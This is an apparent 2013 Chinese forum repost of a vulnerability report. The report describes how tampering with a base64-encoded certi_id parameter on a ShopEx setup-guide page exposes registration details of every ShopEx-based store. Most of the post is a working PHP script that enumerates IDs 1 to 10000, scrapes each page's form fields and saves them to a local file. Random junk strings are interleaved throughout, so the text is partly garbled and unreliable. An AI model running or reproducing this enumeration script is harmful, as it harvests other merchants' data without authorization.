|
|
简要描述:
7 o& e7 I) V; ZShopEx某接口缺陷,可遍历所有网站* F% w- i( `# m' x( O& e6 t/ G
详细说明:
% f( U7 }: l) a8 w" j问题出现在shopex 网店使用向导页面
( g3 r4 I4 m. F* q5 U4 O! |9 u' [9 w9 X1 @$ u, U7 ^6 z. `8 `
5 U2 i( k+ X' g! Y; x6 O+ v8 H$ s0 Z8 e9 I6 A
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=3 @0 s# {1 p8 v) o& q
7 W, m0 @8 K G& r+ ^" n0 v! y$ n
4 e, G1 P6 S, ~- d" A& K% w2 z% T8 ?: N
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}4 A% t9 j- o: m$ Y1 h; E
# k$ K7 t/ r4 K+ B) F6 c( g
/ A- u. r" w- Y' e
1 @& p; y, c) l/ L, X我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 * i& Y: \: g1 i, @ f7 e: w
/ U& @0 S. g# u+ D" v4 Z5 Q! }
, q6 r2 J: b; F0 [: h1 B! D# b1 ~0 C. d: J0 p5 a
<?php6 @4 {6 F, h: Z. @$ [
4 M; Q* q; Y. n2 y* o5 L% p
for ($i=1; $i < 10000; $i++) { //遍历
; H* j5 t& q/ J$ X1 q: X# o/ c( C: Q' g8 o$ O% i# T# X5 x- a& M
ShowshopExD($i);3 d1 A6 ]/ S0 e+ v
5 k$ ~% A/ Y r/ @; k4 x# w3 i }" h# B: c7 T8 ]. Q
+ p8 s+ W3 B# R% {9 A, A
function ShowshopExD($cid) {) Z5 g' @- S- |# a5 H
! C+ P, p7 w( b; f $url='http://guide.ecos.shopex.cn/step2.php';
\+ K" ~8 y' |4 @ O5 P2 ^
# u7 I9 }$ Z4 e0 l) h $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
1 m* ~: u2 O. r! y% Y$ F
; n6 S+ Z3 G' i. T+ r/ J5 W% b $url = $url.'?refer='.$refer;
" }+ B& h4 Z, o' U( w0 R8 r0 {9 s
$ch = curl_init($url);
3 t5 h, t' W( Q' G @; V( Y" N7 c% E ]" ~. L6 q
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
. P) V" L0 f* i. c7 Z& w+ G% P+ K: e! g$ |7 g K
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 x% Y0 d3 E) e, }4 u. r% {1 d1 T
" l( E$ N/ M0 e
$result = curl_exec($ch);
% `) O% k+ T) u; |: w8 g, D# c" a5 h1 T7 } S& q" X
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
% H4 {- w h5 x" z- p# K
/ A# T) z5 n3 `, j' q if(strpos($result,$refer))2 n5 X6 y' c: |5 W* S
3 h# f" |) T6 v+ M {
: l. q4 ^$ ?" C4 l, q3 ~* I
+ D6 R& z1 J0 w $fp = fopen("c:/shopEx.txt",'ab'); //保存文件5 M* z/ x% K" p! m- C
3 _- g0 v: f* J# p& c; M2 O, p0 c
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);( S- s* w' A) x; ^6 |
. R. ]5 e! U9 T- m. o1 Z0 g- [ foreach ($value[1] as $key) {
# S6 i$ e5 F' E
7 [! b' ^ y5 M preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);- ^* R2 D" g( B0 |. X4 v
' X) J- L4 p6 h. J* H9 K0 l echo $res[1][0].':'.$res[3][0]."\r\n";
# ~4 G0 v I/ ?" y$ ?, _ K
, A# e1 c) _+ c+ c0 _) l# ` $col =$res[1][0].':'.$res[3][0]."\r\n";
, Z; r# e, K& Q; S4 R# s" u1 V, ?8 h i% N) b; N
fwrite($fp, $col, strlen($col)); ) ~* @( m7 q8 K6 f6 ?
) k7 K: z$ Z! s/ R. B
}0 f( X2 l' l. L6 `% ]- a
1 d4 Z& T; o7 ?1 B- F/ ^8 G
echo '--------------------------------'."\r\n";8 u4 \: W4 h; X7 J4 B# x* T% S( \
7 H) k6 ]8 u6 I# e2 B" Z
fclose($fp);
6 E7 E; r6 t0 r2 Q
) C2 K/ W7 ]* P4 ?( y! N }$ I `0 B9 n. T. P! k2 ]$ |
u% N7 S" w% x5 s3 [! g8 n7 o" \ flush();
3 Y6 d. b5 d4 h5 C2 [
4 r0 R. \( D* @9 G- r; ~ curl_close($ch);5 @" }" c* k. k/ W" O, f' s
1 F! i: g9 J9 |% B8 `1 z) Q& Y W
}
/ v9 A+ Y; c5 `+ b+ {7 ^& b, n+ w% T
: m9 V6 A3 w5 U! a$ N- p/ c: ~9 V?>
' j4 r6 N2 g2 p; V* { u漏洞证明:
1 p9 `: D( l: ]5 [http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg, Q) `# G( C% y- \, w
refer换成其他加密方式9 q. t6 }& q" R1 s7 L6 m% M
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对